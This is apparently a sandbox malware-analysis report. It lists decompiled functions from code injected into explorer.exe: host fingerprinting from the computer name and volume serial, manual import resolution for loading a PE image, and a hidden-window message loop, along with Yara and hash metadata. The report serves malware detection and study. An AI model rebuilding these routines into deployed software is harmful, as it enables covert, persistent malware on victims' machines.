				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x286fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0x286f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x286f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}
































































                            0x00084a0b
                            0x00084a18
                            0x00084a23
                            0x00084a28
                            0x00084a2a
                            0x00084a2d
                            0x00084a32
                            0x00084a35
                            0x00084a3f
                            0x00084a41
                            0x00084a4e
                            0x00084a57
                            0x00084a57
                            0x00084a64
                            0x00084a7f
                            0x00084a86
                            0x00084a88
                            0x00084a8d
                            0x00084a92
                            0x00084a98
                            0x00084aa7
                            0x00084ac6
                            0x00084ac8
                            0x00084ace
                            0x00084ad4
                            0x00084ad9
                            0x00084add
                            0x00084ae0
                            0x00084aea
                            0x00084aec
                            0x00084aed
                            0x00084af8
                            0x00084afa
                            0x00084afd
                            0x00084b02
                            0x00084b09
                            0x00084b5e
                            0x00084b5e
                            0x00084b63
                            0x00084bca
                            0x00084bcf
                            0x00084bd1
                            0x00084bdb
                            0x00084be0
                            0x00084be0
                            0x00084bf5
                            0x00084bfa
                            0x00084bfc
                            0x00084bff
                            0x00084c01
                            0x00000000
                            0x00000000
                            0x00084c07
                            0x00084c11
                            0x00084c1a
                            0x00084c1f
                            0x00084c22
                            0x00084c28
                            0x00084c2e
                            0x00084c36
                            0x00084c38
                            0x00084c3b
                            0x00084c3c
                            0x00084c41
                            0x00084c44
                            0x00084c47
                            0x00084c49
                            0x00084c4d
                            0x00084c4d
                            0x00084c52
                            0x00084c55
                            0x00084c57
                            0x00084c5b
                            0x00084c5b
                            0x00084c62
                            0x00084c67
                            0x00084c69
                            0x00084c6d
                            0x00084c6f
                            0x00084c75
                            0x00084c79
                            0x00084c7c
                            0x00084c7d
                            0x00084c82
                            0x00084c85
                            0x00084c8a
                            0x00084cb2
                            0x00084cb8
                            0x00084cbf
                            0x00084cce
                            0x00084cd3
                            0x00000000
                            0x00084cd3
                            0x00084cc1
                            0x00000000
                            0x00084c8c
                            0x00084c8c
                            0x00084c91
                            0x00084c98
                            0x00084cdd
                            0x00084cdd
                            0x00084ce4
                            0x00084ce8
                            0x00084ce9
                            0x00084ce9
                            0x00084cf3
                            0x00084cf8
                            0x00084cfb
                            0x00084cfc
                            0x00084cfe
                            0x00084d00
                            0x00084d05
                            0x00084d0c
                            0x00084d4f
                            0x00084d0e
                            0x00084d13
                            0x00084d1b
                            0x00084d1f
                            0x00084d2a
                            0x00084d35
                            0x00084d3d
                            0x00084d41
                            0x00084d49
                            0x00084d49
                            0x00084d0c
                            0x00084d55
                            0x00084d58
                            0x00084d5a
                            0x00084d60
                            0x00084d60
                            0x00084d62
                            0x00084d62
                            0x00000000
                            0x00084d62
                            0x00084c9a
                            0x00084c9a
                            0x00084ca0
                            0x00084ca2
                            0x00084ca7
                            0x00084ca7
                            0x00084ca9
                            0x00084cd8
                            0x00000000
                            0x00084cd8
                            0x00084cab
                            0x00084ae4
                            0x00084ae4
                            0x00000000
                            0x00084ae4
                            0x00084c8a
                            0x00084b69
                            0x00084b77
                            0x00084b8a
                            0x00084b8f
                            0x00084b95
                            0x00084b97
                            0x00084baf
                            0x00084bb4
                            0x00084bbd
                            0x00084bc3
                            0x00000000
                            0x00084bc3
                            0x00084b9f
                            0x00084ba8
                            0x00000000
                            0x00084ba8
                            0x00084b0b
                            0x00084b11
                            0x00084b13
                            0x00084b51
                            0x00084b53
                            0x00000000
                            0x00000000
                            0x00084b55
                            0x00084b59
                            0x00000000
                            0x00084b59
                            0x00084b15
                            0x00084b1f
                            0x00084b2b
                            0x00084b36
                            0x00084b3d
                            0x00084b47
                            0x00084b4c
                            0x00000000
                            0x00084b4c
                            0x00084ae2
                            0x00000000
                            0x00084a66
                            0x00084a71
                            0x00084a77
                            0x00084a79
                            0x00084d64
                            0x00084d64
                            0x00084d66
                            0x00084d6c
                            0x00084d6c
                            0x00000000
                            0x00084a79

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9bc29f469b0c4d889638083fe99749512850c4321a7bd1bc72b38965809efcf2
                            • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                            • Opcode Fuzzy Hash: 9bc29f469b0c4d889638083fe99749512850c4321a7bd1bc72b38965809efcf2
                            • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}















                            0x0008b7a8
                            0x0008b7b1
                            0x0008b7bd
                            0x0008b7c3
                            0x0008b7c5
                            0x0008b7cd
                            0x0008b7e0
                            0x0008b7ef
                            0x0008b7fa
                            0x0008b807
                            0x0008b821
                            0x0008b826
                            0x0008b828
                            0x0008b82f
                            0x0008b83f
                            0x0008b850
                            0x0008b85a
                            0x0008b862
                            0x0008b869
                            0x0008b86c
                            0x0008b889

                            APIs
                            • memset.MSVCRT ref: 0008B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                              • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                            • lstrcatW.KERNEL32 ref: 0008B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                            • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                            • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                            0x0008cf87
                            0x0008cf89
                            0x0008cf90
                            0x0008cf98
                            0x0008cfa2
                            0x0008cfa2
                            0x0008cfa8
                            0x0008cfb1
                            0x0008cfb7
                            0x0008cfb9
                            0x0008cfbd
                            0x0008cfbd
                            0x0008cfc2
                            0x0008cfc8
                            0x0008cfd8
                            0x0008cfe2
                            0x0008cfea
                            0x0008cfed
                            0x0008cff9
                            0x0008cfff
                            0x0008d004
                            0x0008d00a
                            0x0008d010
                            0x0008d016
                            0x0008d01e

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                            • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                            • memset.MSVCRT ref: 0008CFE2
                            • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                            • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                            • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                            • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 135 9249b-924a9 136 924ab-924ae 135->136 137 924b3-924f3 GetModuleHandleA call 8e099 135->137 138 92660-92661 136->138 141 924f9-92510 137->141 142 9265e 137->142 143 92513-9251a 141->143 142->138 144 9251c-92525 143->144 145 92527-92537 143->145 144->143 146 9253a-92541 145->146 146->142 147 92547-9255e LoadLibraryA 146->147 148 92568-9256e 147->148 149 92560-92563 147->149 150 9257d-92586 148->150 151 92570-9257b 148->151 149->138 152 92589 150->152 151->152 153 9258d-92593 152->153 154 92599-925b1 153->154 155 92650-92659 153->155 156 925b3-925d2 154->156 157 925d4-92602 154->157 155->146 160 92605-9260b 156->160 157->160 161 92639-9264b 160->161 162 9260d-9261b 160->162 161->153 163 9261d-9262f 162->163 164 92631-92637 162->164 163->161 164->161
                            C-Code - Quality: 50%
                            			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                            0x000924a1
                            0x000924a9
                            0x000924be
                            0x000924d0
                            0x000924dc
                            0x000924e2
                            0x000924e7
                            0x000924f3
                            0x0009265e
                            0x00000000
                            0x0009265e
                            0x000924f9
                            0x00092502
                            0x00092510
                            0x00092513
                            0x00092522
                            0x00092522
                            0x00092529
                            0x00092537
                            0x0009253a
                            0x00092551
                            0x00092557
                            0x0009255e
                            0x0009256e
                            0x00092586
                            0x00092570
                            0x00092578
                            0x00092578
                            0x00092589
                            0x0009258d
                            0x00092599
                            0x0009259d
                            0x000925a1
                            0x000925a5
                            0x000925b1
                            0x000925dc
                            0x000925e4
                            0x000925f6
                            0x00092602
                            0x000925b3
                            0x000925b8
                            0x000925c3
                            0x000925cf
                            0x000925cf
                            0x0009260b
                            0x00092611
                            0x0009261b
                            0x00092637
                            0x0009261d
                            0x0009262c
                            0x0009262c
                            0x0009261b
                            0x0009263f
                            0x00092648
                            0x00092648
                            0x00092656
                            0x00000000
                            0x00092656
                            0x00092562
                            0x00000000
                            0x00092562
                            0x00000000
                            0x0009253a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                            • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 165 82eda-82f50 memset call 8902d 170 82fcd-82fd4 165->170 171 82f52-82f81 CreateWindowExA 165->171 172 82fdf-82ff4 170->172 173 82fd6-82fd7 170->173 171->172 174 82f83-82f92 ShowWindow 171->174 173->172 175 82f9b 174->175 177 82fba-82fcb 175->177 177->170 179 82f9d-82fa0 177->179 179->170 180 82fa2-82fb2 179->180 180->177
                            C-Code - Quality: 96%
                            			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x286f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x286fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x700e8
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x286fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x286fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x286fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x286fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x286fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x286fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























                            0x00082ee3
                            0x00082ef2
                            0x00082ef9
                            0x00082efe
                            0x00082f18
                            0x00082f20
                            0x00082f2d
                            0x00082f34
                            0x00082f3a
                            0x00082f41
                            0x00082f42
                            0x00082f47
                            0x00082f50
                            0x00082fcd
                            0x00082fcd
                            0x00082fd4
                            0x00082fd7
                            0x00082fdc
                            0x00082fdc
                            0x00082fdf
                            0x00082fe7
                            0x00082fec
                            0x00082ff4
                            0x00082ff4
                            0x00082f77
                            0x00082f7a
                            0x00082f81
                            0x00000000
                            0x00000000
                            0x00082f8a
                            0x00082f8d
                            0x00082f98
                            0x00082fba
                            0x00082fc1
                            0x00082fc6
                            0x00082fcb
                            0x00000000
                            0x00000000
                            0x00082fa0
                            0x00000000
                            0x00000000
                            0x00082fa6
                            0x00082fab
                            0x00082fb2
                            0x00082fb7
                            0x00082fb7
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00082EF9
                            • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                            • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateShowmemset
                            • String ID: 0
                            • API String ID: 3027179219-4108050209
                            • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                            • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 182 84d6d-84d8f 183 84dee-84e1b call 8b7a8 call 8a86d call 8a471 182->183 184 84d91-84db3 call 895c7 * 2 182->184 197 84e1d-84e20 183->197 198 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 183->198 184->183 193 84db5-84db7 184->193 193->183 196 84db9-84dc4 GetModuleHandleA 193->196 199 84dcd 196->199 200 84dc6-84dcb GetModuleHandleA 196->200 201 852b9-852bf 197->201 217 84ea1-84ed9 call 8861a call 84a0b 198->217 218 84e82-84e93 call 8896f 198->218 203 84dd5-84dec call 885c2 * 2 199->203 200->199 200->203 203->183 203->197 228 84ef8-84f1b 217->228 229 84edb-84ee3 217->229 223 84e9c-84e9f 218->223 224 84e95-84e97 call 8a2e3 218->224 223->217 224->223 231 84f1d-84f2b 228->231 232 84f2f-84f54 call 8e2c6 228->232 229->228 230 84ee5-84ee9 229->230 233 84eef-84ef2 230->233 234 851f3-85220 call 895e1 call 892e5 230->234 231->232 242 84f71-84f78 232->242 243 84f56-84f6a call 8e2c6 232->243 233->228 233->234 244 85222-8522b call 8b269 234->244 245 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 234->245 242->234 247 84f7e-84f87 242->247 243->242 257 85239-85246 call 8861a 244->257 258 8522d-85232 244->258 278 852b7 245->278 250 84f89-84f8e 247->250 251 84f96-84fa3 247->251 250->251 254 84f90 250->254 251->234 255 84fa9-84fad 251->255 254->251 259 85082-85088 255->259 260 84fb3-84fb6 255->260 257->245 258->257 259->234 263 8508e-850ff call 849a5 call 8fc1f 259->263 260->234 265 84fbc-8500f call 849a5 call 88604 260->265 263->234 283 85105-85119 call 88604 263->283 265->278 282 85015-8507d call 895e1 call 89640 